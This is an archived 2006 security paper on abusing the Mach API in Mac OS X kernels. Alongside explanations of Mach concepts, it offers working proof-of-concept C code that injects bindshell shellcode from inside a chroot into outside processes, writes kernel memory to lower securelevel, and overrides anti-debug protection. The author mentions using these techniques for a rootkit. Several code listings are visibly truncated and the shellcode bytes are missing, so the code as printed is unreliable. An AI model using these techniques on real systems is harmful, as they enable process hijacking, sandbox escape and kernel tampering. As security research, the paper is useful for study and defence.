Exploit Abusing Mach on Mac OS X


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Abusing Mach on Mac OS X
May, 2006 
[email protected]

1) Foreword

Abstract: This paper discusses the security implications of Mach being
integrated with the Mac OS X kernel.  A few examples are used to illustrate how
Mach support can be used to bypass some of the BSD security features, such as
securelevel.  Furthermore, examples are given that show how Mach functions can
be used to supplement the limited ptrace functionality included in Mac OS X.

Hello reader. I am writing this paper for two reasons.  The first reason is to provide 
some documentation on the Mach side of Mac OS X for people who are unfamiliar 
with this and interested in looking into it. The second reason is to document my own 
research, as I am fairly inexperienced with Mach programming. Because of this
fact, this paper may contain errors. If this is the case, please email me at 
[email protected] and I will try to correct it.

2) Introduction

This paper will try to provide a basic introduction to the Mach kernel
including its history and general design.  From there, details will be
provided about how these concepts are implemented on Mac OS X.  Finally,
this paper will illustrate some of the security concerns which arise
when trying to mix UNIX and Mach together. In this vein, I came across
an interesting quote from the Apple(.com) website [2].

``You can send messages to this port to start and stop the task, kill the task, 
manipulate the tasks address space, and so forth. Therefore, whoever owns 
a send right for a tasks port effectively owns the task and can manipulate 
the tasks state without regard to BSD security policies or any higher-level 
security policies.''

``In other words, an expert in Mach programming with local administrator access
to a Mac OS X machine can bypass BSD and higher-level security features.''

Sounds like a valid model on which to build a server platform to me...

3) History of Mach

The Mach kernel began its life at the Carnegie Mellon University (CMU) [1]
and was originally based off an operating system named ``Accent''. 
It was initially built inside the 4.2BSD kernel. As each of the Mach components
were written, the equivilant BSD component was removed and replaced.
Because of this fact, early versions of Mach were monolithic kernels, similar to
xnu, with BSD code and Mach combined.

Mach was predominantly designed around the need for multi-processor
support.  It was also designed as a Micro-kernel, however xnu, the
implementation used by Mac OS X, is not a micro-kernel. This is due to
the fact that the BSD code, as well as other subsystems, are included in
the kernel.

4) Basic Concepts

This section will run over some of the high level concepts associated
with Mach. These concepts have been documented repeatedly by various
people who are vastly more talented at writing than I am. For that
reason, I advise you to follow some of the links provided in the
references section of this paper.

Mach uses various abstractions to represent the components of the
system. These abstractions can be confusing for someone with a UNIX
background so I'll define them now.

4.1) Tasks

A task is a logical representation of an execution environment. Tasks
are used in order to divide system resources between each running
program.  Each task has its own virtual address space and privilege
level.  Each task contains one or more threads. The tasks address space
and resources are shared between each of its threads.

On Mac OS X, new tasks can be created using either the task_create()
function or the fork() BSD syscall.

4.2) Threads

In Mach, a thread is an independent execution entity. Each thread has
its own registers and scheduling policies. Each thread has access to all
the elements within the task it is contained within.

On Mac OS X, a list of all the threads in a task can be obtained using
the task_threads() function shown below.

   kern_return_t   task_threads
         (task_t                                    task,
          thread_act_port_array_t            thread_list,
          mach_msg_type_number_t*           thread_count);

The Mach API on Mac OS X provides a variety of functions for dealing with 
threads. Through this API, new threads can easily be created, register contents
can be modified and retrieved, and so on.

4.3) Msgs

Messages are used in Mach in order to provide communicate between
threads.  A message is made up of a collection of data objects. Once a
message is created it is sent to a port for which the invoking task has
the appropriate port rights. Port rights can be sent between tasks as a
message. Messages are queued at the destination and processed at the
liberty of the receiving thread. 

On Mac OS X, the mach_msg() function be used to send and receive messages
to and from a port. The declaration for this function is shown below.

   mach_msg_return_t   mach_msg
             (mach_msg_header_t                msg,
              mach_msg_option_t             option,
              mach_msg_size_t            send_size,
              mach_msg_size_t        receive_limit,
              mach_port_t             receive_name,
              mach_msg_timeout_t           timeout,
              mach_port_t                   notify);

4.4) Ports

A port is a kernel controlled communication channel. It provides the
ability to pass messages between threads. A thread with the appropriate
port rights for a port is able to send messages to it. Multiple ports
which have the appropriate port rights are able to send messages to a
single port concurrently. However, only a single task may receive
messages from a single port at any given time.  Each port has an
associated message queue. 

4.5) Port Set

A port set is (unsurprisingly) a collection of Mach ports. Each of the
ports in a port set use the same queue of messages.

5) Mach Traps (system calls)

In order to combine Mach and BSD into one kernel (xnu), syscall numbers
are divided into different tables.  On a PowerPC system, when the ``sc''
instruction is executed, the syscall number is stored in r0 and used to
determine which syscall to execute.  Positive syscall numbers (smaller
than 0x6000) are treated as FreeBSD syscalls. In this case the sysent
table is offset and the appropriate function pointer is used.

In cases where the syscall number is greater than 0x6000, PPC specific
syscalls are used and the ``PPCcalls'' table is offset.  However, in the
case of a negative syscall number, the mach_trap_table is indexed and

The code below is taken from the xnu source and shows this process.

   oris    r15,r15,SAVsyscall >> 16     ; Mark that it this is a 
                                        ; syscall

   cmplwi  r10,0x6000                   ; Is it the special ppc-only 
                                        ; guy?
   stw     r15,SAVflags(r30)            ; Save syscall marker
   beq--   cr6,exitFromVM               ; It is time to exit from
                                        ; alternate context...

   beq--   ppcscall                     ; Call the ppc-only system 
                                        ; call handler...

   mr.     r0,r0                        ; What kind is it?
   mtmsr   r11                          ; Enable interruptions

   blt--   .L_kernel_syscall            ; System call number if
                                        ; negative, this is a mach call...

   lwz     r8,ACT_TASK(r13)             ; Get our task
   cmpwi   cr0,r0,0x7FFA                ; Special blue box call?
   beq--   .L_notify_interrupt_syscall  ; Yeah, call it...

On an Intel system, things are a little different. The ``int 0x81'' (cd
81) instruction is used to call Mach traps. The ``sysenter'' instruction
is used for the BSD syscalls. However, the syscall number convention
remains the same. The eax register is used to store the syscall number
in either case.

It seems that most people developing shellcode on Mac OS X stick to
using the FreeBSD syscalls. This may be due to lack of familiarity with
Mach traps, so hopefully this paper is useful in re-mediating that.  I
have extracted a list of the Mach traps in the mach_trap_table from the
xnu kernel. (792.6.22). 

5.1) List of mach traps in xnu-792.6.22

/* 26 */   mach_reply_port
/* 27 */   thread_self_trap
/* 28 */   task_self_trap
/* 29 */   host_self_trap
/* 31 */   mach_msg_trap
/* 32 */   mach_msg_overwrite_trap
/* 33 */   semaphore_signal_trap
/* 34 */   semaphore_signal_all_trap
/* 35 */   semaphore_signal_thread_trap
/* 36 */   semaphore_wait_trap
/* 37 */   semaphore_wait_signal_trap
/* 38 */   semaphore_timedwait_trap
/* 39 */   semaphore_timedwait_signal_trap
/* 41 */   init_process
/* 43 */   map_fd
/* 45 */    task_for_pid
/* 46 */   pid_for_task
/* 48 */   macx_swapon
/* 49 */   macx_swapoff
/* 51 */   macx_triggers
/* 52 */   macx_backing_store_suspend
/* 53 */   macx_backing_store_recovery
/* 59 */    swtch_pri
/* 60 */   swtch
/* 61 */   thread_switch
/* 62 */   clock_sleep_trap
/* 89 */   mach_timebase_info_trap
/* 90 */   mach_wait_until_trap
/* 91 */   mk_timer_create_trap
/* 92 */   mk_timer_destroy_trap
/* 93 */   mk_timer_arm_trap
/* 94 */   mk_timer_cancel_trap
/* 95 */   mk_timebase_info_trap
/* 100 */   iokit_user_client_trap

When executing one of these traps the number on the left hand side
(multiplied by -1) must be placed into the eax register. (intel) Each of
the arguments must be pushed to the stack in reverse order.  Although I
could go into a low level description of how to send a mach msg here,
the paper  in the references has already done this and the author is a
lot better at it than me.  I strongly suggest reading this paper if you
are at all interested in the subject matter.

6) MIG

Due to the fact that Mach was designed as a micro-kernel and designed to
function across multiple processors and machines, a large portion of the
functionality is implemented by sending messages between tasks.  In
order to facilitate this process, IPC interfaces must be defined to
provide the added functionality. 

To achieve this, Mach (and Apple) use a language called "Mach Interface 
Generator" (MIG). MIG is a subset of the Matchmaker language, which 
generates C or C++ interfaces for sending messages between tasks.

When using MIG, files with the extension ".defs" are written containing
a description of the interface. These files are compiled into a .c/.cpp
file and a .h header file. This is done using the /usr/bin/mig tool on
Mac OS X. These generated files contain the appropriate C or C++ stub
code in order to handle the messages defined in the defs file.

This can be confusing for someone from a UNIX or Windows background who
is new to Mach/Mac OS X. Many of the Mach functions discussed in this paper
are actually implemented as a .defs file. These files are shipped with the
xnu source (which is no longer available).

An example from one of these files (osfmk/mach/mach_vm.defs) showing the
definition of the vm_allocate() function is provided below.

 *      Allocate zero-filled memory in the address space
 *      of the target task, either at the specified address,
 *      or wherever space can be found (controlled by flags),
 *      of the specified size.  The address at which the
 *      allocation actually took place is returned.
#if !defined(_MACH_VM_PUBLISH_AS_LOCAL_)
routine mach_vm_allocate(
routine vm_allocate(
                target          : vm_task_entry_t;
        inout   address         : mach_vm_address_t;
                size            : mach_vm_size_t;
                flags           : int);

It's useful to compile these .defs files with the /usr/bin/mig tool
and then read the generated c code to work out what should be done
when writing shellcode with the mach_msg mach trap.

For more information on MIG check out [6].  Also, Richard Draves
did a talk on MIG, his slides are available from [7]. 

7) Replacing ptrace()

A lot of people seem to move to Mac OS X from a Linux or BSD background
and therefore expect the ptrace() syscall to be useful. However,
unfortunately, this isn't the case on Mac OSX.  For some ungodly reason,
Apple decided to leave ptrace() incomplete and unable to do much more
than take a feeble attempt at an anti-debug mechanism or single step the

As it turns out, the anti-debug mechanism (PT_DENY_ATTACH) only stops
future ptrace() calls from attaching to the process. Since ptrace()
functionality is highly limited on Mac OS X anyway, and task_for_pid() is
unrestricted, this basically has no purpose. 

In this section I will run through the missing features from a /real/ 
implementation of ptrace and show you how to implement them on Mac OS X.

The first and most useful thing we'll look at is how to get a port for
a task. Assuming you have sufficient privileges to do so, you can call
the task_for_pid() function providing a unix process id and you will
receive a port for that task.

This function is pretty straightforward to use and works as you'd expect.

   pid_t    pid;
   task_t   port;

   task_for_pid(mach_task_self(), pid, &port);

After this call, if sufficient privileges were held, a port will be
returned in ``port''. This can then be used with later API function
calls in order to manipulate the target tasks resources.  This is pretty
similar conceptually to the ptrace() PTRACE_ATTACH functionality.

One of the most noticeable changes to ptrace() on Mac OS X is the fact
that it is no longer possible to retrieve register state as you would
expect.  Typically, the ptrace() commands PTRACE_GETREGS and
PTRACE_GETFPREGS would be used to get register contents.  Fortunately
this can be achieved quite easily using the Mach API.

The task_threads() function can be used with a port in order to get a
list of the threads in the task.

   thread_act_port_array_t thread_list;
   mach_msg_type_number_t thread_count;

   task_threads(port, &thread_list, &thread_count);

Once you have a list of threads, you can then loop over them and
retrieve register contents from each. This can be done using the
thread_get_state() function.

The code below shows the process involved for retrieving the register
contents from a thread (in this case the first thread) of a
thread_act_port_array_t list.

   This code will only work on ppc machines, i396_thread_state_t type is 
   used for intel.

   ppc_thread_state_t ppc_state;
   mach_msg_type_number_t sc = PPC_THREAD_STATE_COUNT;
   long thread = 0;   // for first thread


For PPC machines, you can then print out the registered contents for a
desired register as so:

   printf(" lr: 0x%x\n",ppc_state.lr);

Now that register contents can be retrieved, we'll look at changing them 
and updating the thread to use our new contents.

This is similar to the ptrace PTRACE_SETREGS and PTRACE_SETFPREGS
requests on Linux. We can use the mach call threadsetstate to do this.
I have written some code to put these concepts together into a tiny
sample program.

The following small assembly code will continue to loop until the r3
register is nonzero.

   .globl _main

      li      r3,0
      cmpwi   cr7,r3,0
      beq-    cr7,up

The C code below attaches to the process and modifies the value of the
r3 register to 0xdeadbeef.

 * This sample code retrieves the old value of the
 * r3 register and sets it to 0xdeadbeef.
 * - nemo

#include <stdio.h>
#include <stdlib.h>
#include <sys/types.h>
#include <mach/mach_types.h>
#include <mach/ppc/thread_status.h>

void error(char *msg)
        printf("[!] error: %s.\n",msg);

int main(int ac, char **av)
        ppc_thread_state_t ppc_state;
        mach_msg_type_number_t sc = PPC_THREAD_STATE_COUNT;
        long thread = 0;        // for first thread
        thread_act_port_array_t thread_list;
        mach_msg_type_number_t thread_count;
        task_t  port;
        pid_t   pid;

        if(ac != 2) {
                printf("usage: %s <pid>\n",av[0]);

        pid = atoi(av[1]);

        if(task_for_pid(mach_task_self(), pid, &port))
                error("cannot get port");

        // better shut down the task while we do this.
        if(task_suspend(port)) error("suspending the task");

        if(task_threads(port, &thread_list, &thread_count))
                error("cannot get list of tasks");

        )) error("getting state from thread");

        printf("old r3: 0x%x\n",ppc_state.r3);

        ppc_state.r3 = 0xdeadbeef;

        )) error("setting state");

        if(task_resume(port)) error("cannot resume the task");

        return 0;

A sample run of these two programs is as follows:

   -[nemo@gir:~/code]$ ./tst&
   [1] 5302
   -[nemo@gir:~/code]$ gcc chgr3.c -o chgr3
   -[nemo@gir:~/code]$ ./chgr3 5302
   old r3: 0x0
   [1]+  Trace/BPT trap          ./tst

As you can see, when the C code is run, ./tst has it's r3 register
modified and the loop exits, hitting the trap.

Some other features which have been removed from the ptrace() call on
Mac OS X are the ability to read and write memory.  Again, we can
achieve this functionality using Mach API calls.  The functions
vm_write() and vm_read() (as expected) can be used to write and read the
address space of a target task.

These calls work pretty much how you would expect.  However there are
examples throughout the rest of this paper which use these functions.
The functions are defined as follows:

kern_return_t   vm_read
                (vm_task_t                          target_task,
                 vm_address_t                           address,
                 vm_size_t                                 size,
                 size                                  data_out,
                 target_task                         data_count);

kern_return_t   vm_write
                (vm_task_t                          target_task,
                 vm_address_t                           address,
                 pointer_t                                 data,
                 mach_msg_type_number_t              data_count);

These functions provide similar functionality to the ptrace requests:

The memory being read/written must have the appropriate protection in
order for these functions to work correctly. However, it is quite easy
to set the protection attributes for the memory before the read or write
takes place. To do this, the vm_protect() API call can be used.

kern_return_t   vm_protect
                 (vm_task_t           target_task,
                  vm_address_t            address,
                  vm_size_t                  size,
                  boolean_t           set_maximum,
                  vm_prot_t        new_protection);

The ptrace() syscall on Linux also provides a way to step a process up
to the point where a syscall is executed. The PTRACE_SYSCALL request is
used for this. This functionality is useful for applications such as
"strace" to be able to keep track of system calls made by an
application. Unfortunately, this feature does not exist on Mac OS X. The
Mach api provides a very useful function which would provide this

kern_return_t   task_set_emulation
                (task_t                                    task,
                 vm_address_t                  routine_entry_pt,
                 int                             syscall_number);

This function would allow you to set up a userspace handler for a
syscall and log it's execution. However, this function has not been
implemented on Mac OS X.

8) Code injection

The concept of using the Mach API in order to inject code into another
task has been demonstrated numerous times. The most well known
implementation is named machinject.  This code uses task_for_pid() to
get a port for the chosen pid. The threadcreaterunning() function is
used to create a thread in the task and set the register state. In this
way control of execution is gained.  This code has been rewritten using
the same method for the intel platform. 

It's also pretty easy to set the thread starting state to point to the
dlopen() function and load a dylib from disk. Or even vm_map() an object
file into the process space by hand and fix up relocations yourself.

9) Moving into the kernel

Since Mac OS X 10.4.6 on intel systems (the latest release of Mac OSX at
the time of writing this paper) both /dev/kmem and /dev/mem have been
removed.  Because of this fact, a new method for entering and
manipulating the kernel memory is needed.

Luckily, Mach provides a solution. By using the task_for_pid() mach trap
and passing in pid=0 the kernel machportt port is available. Obviously,
root privileges are required in order to do so.

Once this port is acquired, you are able to read and write directly to
the kernel memory using the vm_read() and vm_write() functions. You can
also vm_map() or vm_remap() files and mappings directly into kernel

I am using this functionality for a new version of the WeaponX rootkit, 
but there are plenty other reasons why this is useful.

10) Security considerations of a UNIX / Mach hybrid

Many problems arise when both UNIX and Mach aspects are provided on the
same system. As the quote from the Apple Security page  says (mentioned
in the introduction). A good Mach programmer will be able to bypass high
level BSD security functionality by using the Mach API/Mach Traps on Mac

In this section I will run through a couple of examples of situations
where BSD security can be bypassed. There are many more cases like this.
I'll leave it up to you (the reader) to find more.

The first bypass which we will look at is the "kern.securelevel" sysctl.
This sysctl is used to restrict various functionality from the root
user.  When this sysctl is set to -1, the restrictions are non-existent.
Under normal circumstances the root user should be able to raise the
securelevel however lowering the securelevel should be restricted.

Here is a demonstration of this:

   -[root@fry:~]$ id
   uid=0(root) gid=0(wheel) 

   -[root@fry:~]$ sysctl -a | grep securelevel
   kern.securelevel = 1

   -[root@fry:~]$ sysctl -w kern.securelevel=-1
   kern.securelevel: Operation not permitted

   -[root@fry:~]$ sysctl -w kern.securelevel=2
   kern.securelevel: 1 -> 2

   -[root@fry:~]$ sysctl -w kern.securelevel=1
   kern.securelevel: Operation not permitted

As you can see, modification of this sysctl works as described above.
However! Due to the fact that we can task_for_pid() pid=0 and write to
kernel memory, we can bypass this.

In order to do this, we simply get the address of the variable in
kernel- space which stores the securelevel. To do this we can use the
`nm' tool.

   -[root@fry:~]$ nm /mach_kernel | grep securelevel
   004bcf00 S _securelevel

We can then use this value by calling task_for_pid() to get the kernel
task port, and calling vm_write() to write to this address. The code
below does this.

Here is an example of this code being used.

   -[root@fry:~]$ sysctl -a | grep securelevel
   kern.securelevel = 1

   -[root@fry:~]$ ./slevel -1
   [+] done!

   -[root@fry:~]$ sysctl -a | grep securelevel
   kern.securelevel = -1

A kext could also be used for this. But this is neater and relevant.

 * [ slevel.c ]
 * [email protected] 
 * 2006
 * Tools to set the securelevel on
 * Mac OSX Build 8I1119 (10.4.6 intel).

#include <mach/mach.h>
#include <stdint.h>
#include <stdlib.h>
#include <stdio.h>

// -[nemo@fry:~]$ nm /mach_kernel | grep securelevel
// 004bcf00 S _securelevel
#define  SECURELEVELADDR 0x004bcf00

void error(char *msg)
        printf("[!] error: %s\n",msg);

void usage(char *progname)
        printf("[+] usage: %s <value>\n",progname);

int main(int ac, char **av)
        mach_port_t    kernel_task;
        kern_return_t  err;
        long           value = 0;

        if(ac != 2)

        if(getuid() && geteuid())
                error("requires root.");

        value = atoi(av[1]);

        err = task_for_pid(mach_task_self(),0,&kernel_task);
        if ((err != KERN_SUCCESS) || !MACH_PORT_VALID(kernel_task))
                error("getting kernel task.");

        // Write values to stack.
        if(vm_write(kernel_task, (vm_address_t) SECURELEVELADDR, (vm_address_t)&value, sizeof(value)))
                error("writing argument to dlopen.");

        printf("[+] done!\n");
        return 0;

The chroot() call is a UNIX mechanism which is often (mis)used for
security purposes. This can also be bypassed using the Mach
API/functionality.  A process running on Mac OSX within a chroot() is
able to attach to any process outside using the task_for_pid() Mach
trap.  Although neither of these problems are significant, they are an
indication of some of the ways that UNIX functionality can be bypassed
using the Mach API.

The code below simply loops through all pids from 1 upwards and attempts
to inject a small code stub into a new thread. It is written for PowerPC
architecture. I have also included some shellcode for intel arch in case
anyone has the need to use it in these circumstances.  

 * sample code to break chroot() on osx
 * - nemo
 * This code is a PoC and by so, is pretty harsh
 * I just trap in any process which isn't desirable.
 * DO NOT RUN ON A PRODUCTION BOX (or if you do, email 
 * me the results so I can laugh at you)

#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>
#include <sys/types.h>
#include <sys/mman.h>
#include <mach/mach.h>
#include <mach/ppc/thread_status.h>
#include <mach/i386/thread_state.h>
#include <dlfcn.h>

#define STACK_SIZE 0x6000
#define MAXPID     0x6000 

char ppc_probe[] =
// stat code
// bindshell from metasploit. Port 4444

unsigned char x86_probe[] =  
// stat code, cheq for /mach_kernel. Makes sure we're outside 
// the chroot.
// bindshell - 89 bytes - port 4444  
// based off metasploit freebsd code.

int injectppc(pid_t pid,char *sc,unsigned int size)
        kern_return_t ret;
        mach_port_t mytask;
        vm_address_t stack;
        ppc_thread_state_t ppc_state;
        thread_act_t thread;
        long blr = 0x7fe00008;

        if ((ret = task_for_pid(mach_task_self(), pid, &mytask)))
      return -1;

        // Allocate room for stack and shellcode.
        if(vm_allocate(mytask, &stack, STACK_SIZE, TRUE) != KERN_SUCCESS)
      return -1;

   // Write in our shellcode
        if(vm_write(mytask, (vm_address_t)((stack + 650)&~2), (vm_address_t)sc, size))
      return -1;

        if(vm_write(mytask, (vm_address_t) stack + 960, (vm_address_t)&blr, sizeof(blr)))
      return -1;
   // Just in case.
    if(vm_protect(mytask,(vm_address_t) stack, STACK_SIZE, 
      return -1;

        ppc_state.srr0  = ((stack + 650)&~2);
        ppc_state.r1    = stack + STACK_SIZE - 100;
        ppc_state.lr    = stack + 960;          // terrible blr cpu usage but this 
                  // whole code is a hack so shutup!.

        if(thread_create_running(mytask, PPC_THREAD_STATE,
          (thread_state_t)&ppc_state, PPC_THREAD_STATE_COUNT, &thread)
        != KERN_SUCCESS)
      return -1;

        return 0;

int main(int ac, char **av)
   pid_t pid;
   // (pid = 0) == kernel
   printf("[+] Breaking chroot() check for a non-chroot()ed shell on port 4444 (TCP).\n");
   for(pid = 1; pid <= MAXPID ; pid++) 

   return 0;

The output below shows a sample run of this code on a stock standard Mac
OSX 10.4.6 Mac mini. As you can see, a non privilege user within the
chroot() is able to attach to a process running at the same privilege
level outside of the chroot().  Some shellcode can then be injected into
the process to bind a shell.

   -[nemo@gir:~/code]$ gcc break.c -o break
   -[nemo@gir:~/code]$ cp break chroot/
   -[nemo@gir:~/code]$ sudo chroot chroot/
   -[root@gir:/]$ ./dropprivs 

An interesting note about this little ./dropprivs program is that I had
to use seteuid()/setuid() separately rather than using the setreuid()
function. It appears setreuid() and setregid() don't actually work at
all. Andrewg summed this situation up nicely:

<andrewg> best backdoor ever 

   -[nemo@gir:/]$ ./break 
   [+] Breaking chroot() check for a non-chroot()ed shell on port 4444 (TCP).
   -[nemo@gir:/]$ Illegal instruction
   -[root@gir:/]$ nc localhost 4444
   ls -lsa /mach_kernel
   8472 -rw-r--r--   1 root  wheel  4334508 Mar 27 14:27 /mach_kernel
   uid=501(nemo) gid=501(nemo) groups=501(nemo)

Another method of breaking out from a chroot() environment would be to
simply task_for_pid() pid 0 and write into kernel memory. However since
this would require root privileges I didn't bother to implement it.
This code could quite easily be implemented as shellcode.  However, due
to time constraints and lack of caring, I'll leave it up to you to do

== ptrace

As I mentioned in the ptrace section of this paper, the ptrace() syscall
has been heavily bastardized and is pretty useless now.  However, a new
ptrace command PT_DENY_ATTACH has been implemented to enable a process
to request that other processes will not be able to ptrace attach to it.

The following sample code shows the use of this:

   #include <stdio.h>
   #include <sys/types.h>
   #include <sys/ptrace.h>

   static int changeme =  0;

   int main(int ac, char **av)

      ptrace(PT_DENY_ATTACH, 0, 0, 0);

      while(1) {
         if(changeme) {
            printf("[+] hacked.\n");

      return 1;       

This code does nothing but sit and spin while checking the status of a
global variable which is never changed.  As you can see below, if we try
to attach to this process in gdb (which uses ptrace) our process will
receive a SIGSEGV.

   (gdb) at hackme.25143 
   A program is being debugged already.  Kill it? (y or n) y
   Attaching to program: `/Users/nemo/hackme', process 25143.
   Segmentation fault

However we can use the Mach API, as mentioned earlier, and still attach
to the process just fine.  We can use the `nm' command in order to get
the address of the static changeme variable.

   -[nemo@fry:~]$ nm hackme | grep changeme
   0000202c b _changeme

Then, using the following code, we task_for_pid() the process and 
modify the contents of this variable (as an example.)

   #include <stdio.h>
   #include <stdlib.h>
   #include <unistd.h>
   #include <sys/types.h>
   #include <sys/mman.h>
   #include <mach/mach.h>
   #include <dlfcn.h>

   #define CHANGEMEADDR 0x202c

   void error(char *msg)
      printf("[!] error: %s\n",msg);

   int main(int ac, char **av)
      mach_port_t port;
      long    content = 1;

      if(ac != 2) {
         printf("[+] usage: %s <pid>\n",av[0]);

      if(task_for_pid(mach_task_self(), atoi(av[1]), &port))

      if(vm_write(port, (vm_address_t) CHANGEMEADDR, (vm_address_t)&content, sizeof(content)))
         error("writing to process");

      return 0;

As you can see below, this will result in the loop terminating as expected.

   -[nemo@fry:~]$ ./hackme
   [+] hacked.

11) Conclusion

Well you actually read all the way to the bottom of this paper! Hope it
wasn't too boring.  Things are changing a little on Mac OS X. The later
releases (10.4.6) on Intel have new restrictions in place on the
task_for_pid() function.  These restrictions require you to be part of
the "procmod" group or root in order to call the task_for_pid() mach
trap. Luckily these restrictions are easily bypassable.

There is also mixed discussion (gossip) about whether or not Mach will
be completely removed from Mac OS X in future. I have no idea how true
(or not) this is though.

If you noticed any problems with the content, as I mentioned earlier,
please email me at [email protected] and let me know. No pointless
(unconstructive) criticism please though.

Thanks to everyone at felinemenace and pulltheplug for your ongoing
support and friendship. Also thanks to anyone who proof read this paper
for me and to the uninformed team for giving me the opportunity to
publish this.


[1] CMU.  The Mach Project. 

[2] Apple.  Apple Security Overview. 

[3] Mach.  Mach Man-pages. 
    http://felinemenace.org/ nemo/mach/manpages

[4] Rentzsch.  Mach Inject. 

[5] Guiheneuf.  Mach Inject. 

[6] Richard P. Draves/Michael B. Jones and Mary R. Thompson.  Mach Interface Generator. 
    http://felinemenace.org/ nemo/mach/mig.txt

[7] Richard P. Draves.  MIG Slides. 
    http://felinemenace.org/ nemo/mach/Slides

[8] Wikipedia.  Mach Kernel. 

[9] Feline Menace.  The Mach System. 
    http://felinemenace.org/ nemo/mach/Mach.txt

[10] OSX Code.  Mach. 

[11] CMU.  A Programmer's Guide to the Mach System Calls. 

[12] CMU.  A Programmer's Guide to the Mach User Environment. 

# milw0rm.com [2006-06-09]

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